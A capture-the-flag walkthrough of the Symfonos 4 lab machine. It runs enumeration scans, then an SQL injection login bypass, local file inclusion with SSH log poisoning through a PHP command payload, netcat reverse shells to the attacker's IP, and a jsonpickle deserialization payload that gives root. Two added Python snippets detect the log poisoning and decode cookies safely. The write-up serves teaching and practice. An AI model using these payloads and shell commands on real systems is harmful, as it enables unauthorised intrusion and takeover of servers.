# Symfonos 4

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/sym4 192.168.1.136
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 23:43 EDT
Nmap scan report for 192.168.1.136
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)
|   256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)
|_  256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:DA:3F:AA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.27 seconds
```

As usual, port 80 is open, so we can open the target IP in the web browser.

![](/files/-M8JIMcvrY3A4Lq6Va0R)

Let's run dirb.

### Dirb

```
dirb http://192.168.1.136
```

```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 27 00:05:13 2020
URL_BASE: http://192.168.1.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.136/ ----
==> DIRECTORY: http://192.168.1.136/css/
+ http://192.168.1.136/index.html (CODE:200|SIZE:201)
==> DIRECTORY: http://192.168.1.136/javascript/
==> DIRECTORY: http://192.168.1.136/js/
==> DIRECTORY: http://192.168.1.136/manual/
+ http://192.168.1.136/robots.txt (CODE:403|SIZE:298)
+ http://192.168.1.136/server-status (CODE:403|SIZE:301)
```

We can see there is a `/robots.txt`.

![](/files/-M8JIjVs1EljAt4OJRU5)

We don't have permission to access this file, so I use `nikto` to enumerate further.

### Nikto

```
nikto -h http://192.168.1.136
```

```
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.136
+ Target Hostname:    192.168.1.136
+ Target Port:        80
+ Start Time:         2020-05-27 00:17:10 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/atlantis.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: c9, size: 59058b74c9871, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2020-05-27 00:18:10 (GMT-4) (60 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

We can see that `/atlantis.php` is listed in the robots.txt.

![](/files/-M8JM0uQy_l61uOwoatg)

Seeing a login form, the first thing I think of is SQL injection.

After some tries, I can bypass the login form using this payload in the username field:

```
admin' or '1'='1'#
```

![](/files/-M8JSBJm3cf6bPDZMaPV)

I can't seem to find anything. I even tried LFI with `../../../../../../etc/passwd`, but it does not work. So I went back to more enumeration.

### Gobuster

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.1.136 -x php
```

```
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.136
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/27 00:36:55 Starting gobuster
===============================================================
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/sea.php (Status: 302)
/atlantis.php (Status: 200)
/server-status (Status: 403)
/gods (Status: 301)
===============================================================
2020/05/27 00:41:53 Finished
===============================================================
```

Ah, we can see that there is a `/gods` directory.

![](/files/-M8JSLL_ozyegMyeARPT)

This is where the log files are stored. Realising that the page is reading a log file, it seems we can request `../../../../../../var/log/auth` through it.

If we do it the proper way, it looks like this:

## Exploitation

### Wfuzz

We will use Wfuzz.

First, we need to intercept a request with Burp to get the **PHPSESSID**.

![](/files/-M8KInNDjnjF1GM22wdo)

Then, I use

```
wfuzz -c -b 'PHPSESSID=6mlbncfhcq8vhshrb4iqc5ev1r' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt http://192.168.1.106/sea.php?file=FUZZ
```

At first I didn't get what I wanted. When I checked the wordlist, I was surprised to find that it does not include `../../../../../../../var/log/auth`.

![](/files/-M8KJR2iz7vWvni_1Pu0)

So I add it myself, then we can run the command again.

![](/files/-M8KJWAAMFpcw9UQjATA)

We need to hide the responses that have a word count of 39 (`--hw 39`):

```
wfuzz -c -b 'PHPSESSID=6mlbncfhcq8vhshrb4iqc5ev1r' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hw 39 http://192.168.1.106/sea.php?file=FUZZ
```

Running it again, we get this:

![](/files/-M8KJezKj2JCwUIyHJtC)

![](/files/-M8KOVc1B9F5k4s81EJd)

We can see the log file now, so we can poison it through SSH and include it via the LFI:

```
ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.106
```

![](/files/-M8KTrYZw3McP6bcvTS2)

Then we can go to end of the URL and add `&c=id;whoami;`

![](/files/-M8KU3VNk6IScc_9Nge1)
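As an added defender's example (not part of the original write-up), the following Python scans constructed sshd `auth.log` and Apache access-log lines for the two halves of the technique above: a PHP tag logged in an SSH username, and a `sea.php?file=` request that traverses into `/var/log` and carries a command parameter. The log lines, IP addresses and the `c`/`cmd` parameter names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (not from the original target): the sshd entry carries a PHP
# tag in the username field, the first access entry includes that log with a "c" parameter.
AUTH_LOG = """\
May 27 01:02:03 symfonos4 sshd[1234]: Invalid user <?php system($_GET["c"]); ?> from 192.0.2.10 port 51234
May 27 01:02:05 symfonos4 sshd[1240]: Failed password for invalid user bob from 192.0.2.11 port 51236 ssh2
"""
ACCESS_LOG = """\
192.0.2.10 - - [27/May/2020:01:03:00 -0400] "GET /sea.php?file=../../../../../../../var/log/auth&c=id HTTP/1.1" 200 812
192.0.2.12 - - [27/May/2020:01:03:10 -0400] "GET /sea.php?file=poseidon HTTP/1.1" 200 1290
192.0.2.13 - - [27/May/2020:01:03:20 -0400] "GET /atlantis.php HTTP/1.1" 200 1540
"""

# A PHP open tag, a superglobal lookup, or a system() call inside a logged username.
PHP_MARKER = re.compile(r"<\?(php)?\s|\$_(GET|POST|REQUEST)\s*\[|\bsystem\s*\(", re.I)
SSHD_INVALID = re.compile(r"Invalid user (.*) from (\S+) port")
# Combined log format: client IP, request line, status code.
ACCESS = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')


def find_poisoned_usernames(auth_log):
    """(source_ip, username) for sshd entries whose rejected username carries PHP code."""
    return [(m.group(2), m.group(1)) for line in auth_log.splitlines()
            if (m := SSHD_INVALID.search(line)) and PHP_MARKER.search(m.group(1))]


def find_lfi_requests(access_log):
    """Requests whose file= parameter traverses directories or points into /var/log."""
    hits = []
    for line in access_log.splitlines():
        m = ACCESS.match(line)
        if not m:
            continue
        src, target, status = m.groups()
        params = parse_qs(urlsplit(target).query)  # parse_qs also URL-decodes the values
        for value in params.get("file", []):
            if "../" in value or value.startswith("/") or "/var/log" in value:
                cmd = params.get("c") or params.get("cmd")
                hits.append({"src": src, "file": value, "status": int(status),
                             "cmd": cmd[0] if cmd else None})
    return hits


def triage(auth_log, access_log):
    """Correlate both logs: a command parameter on a log include after a poisoned login means RCE."""
    poisoned = {ip for ip, _ in find_poisoned_usernames(auth_log)}
    alerts = [("log_poisoning", ip) for ip in sorted(poisoned)]
    for hit in find_lfi_requests(access_log):
        kind = "rce_via_log_include" if hit["cmd"] and poisoned else "lfi"
        alerts.append((kind, hit["src"]))
    return alerts
```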

We can now get a reverse shell from it.

Our machine

```
nc -nlvp 4444
```

At the end of the URL

```
c=nc -e /bin/bash 192.168.1.116 4444
```

![](/files/-M8KUahQKOlZnd542hyz)

We got a shell!

Then we can type

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

After some digging, we can use

```
ss -l 
```

to see which ports are listening on the machine.

![](/files/-M8Kf4aeQF-yhv7JQ2L1)

As we can see, there is another port listening.

### Port Forward

We can forward that port to get access to it. Since it only listens locally, we use `socat` on the target to expose it:

```
socat TCP-LISTEN:8888,fork,reuseaddr TCP:127.0.0.1:8080 &
```

Then we can access it on port 8888.

![](/files/-M8Kg3dvAK5tEUAuF9SC)

Then click the `Main page`

![](/files/-M8KgDXI-ypoONIZ8ANG)

Since the page mentions a cookie, let's check the cookies.

![](/files/-M8KhFCkmU1Qx56lp8LY)

We can decode the password with this [website](https://www.base64decode.org/) and we get this:

![](/files/-M8KhVKeOL8T0GqFgf19)

After some research, this turns out to be a jsonpickle deserialization exploit. We can read these three sites

{% embed url="<https://jsonpickle.github.io/>" %}

{% embed url="<https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/>" %}

{% embed url="<https://github.com/jsonpickle/jsonpickle/issues/178>" %}

to get an idea of how it works.

The code looks like this

```
{"py/reduce": "__main__.Shell", "py/reduce": [{"py/function": "os.system"},["nc -e /bin/bash 192.168.1.116 9000"],0,0,0]}
```

Then we base64-encode it, put it in the cookie, and get a reverse shell.

Remember to set up a listener on our machine first.

Then refresh the page, and we get root!

![](/files/-M8KlAdfh-JAUT038Zfo)
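As an added example (not code from the original write-up or from the jsonpickle project), this Python shows how the session cookie could be handled safely on the server side, assuming the cookie is base64 of a JSON/jsonpickle-encoded flat dict of strings such as username and password: it parses with plain `json` instead of `jsonpickle.decode` and refuses any `py/` tag before trusting the value. The cookie contents are constructed.

```python
import base64
import json

# Constructed cookie values (not captured from the original target). The first is what a
# harmless session looks like; the second carries a jsonpickle "py/reduce" tag.
BENIGN_COOKIE = base64.b64encode(
    json.dumps({"username": "poseidon", "password": "constructed"}).encode()).decode()
TAGGED_COOKIE = base64.b64encode(
    b'{"py/reduce": [{"py/function": "os.system"}, ["echo constructed-marker"], 0, 0, 0]}'
).decode()


def find_pickle_tags(node, path="$"):
    """Return [(path, key)] for every object key starting with "py/" anywhere in a parsed JSON value.

    jsonpickle uses such keys (py/object, py/reduce, py/function, ...) to rebuild arbitrary
    Python objects on decode; a session that only ever holds strings has no use for them.
    """
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if isinstance(key, str) and key.startswith("py/"):
                found.append((path, key))
            found += find_pickle_tags(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            found += find_pickle_tags(value, f"{path}[{index}]")
    return found


def load_session_cookie(cookie_value):
    """Decode base64 + plain JSON (never jsonpickle.decode) and accept only a flat dict of strings."""
    try:
        data = json.loads(base64.b64decode(cookie_value, validate=True))
    except ValueError as exc:  # binascii.Error and JSONDecodeError both subclass ValueError
        raise ValueError("malformed session cookie") from exc
    tags = find_pickle_tags(data)
    if tags:
        raise ValueError(f"jsonpickle tags refused: {tags}")
    if not isinstance(data, dict) or not all(
            isinstance(k, str) and isinstance(v, str) for k, v in data.items()):
        raise ValueError("session must be a flat mapping of strings")
    return data


def is_safe_cookie(cookie_value):
    """True when the cookie loads without any object reconstruction being involved."""
    try:
        load_session_cookie(cookie_value)
        return True
    except ValueError:
        return False
```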

Navigate to `/root` and get the `flag.txt`

![](/files/-M8KlNSdzL24jPIZWr0P)

Congratulations!

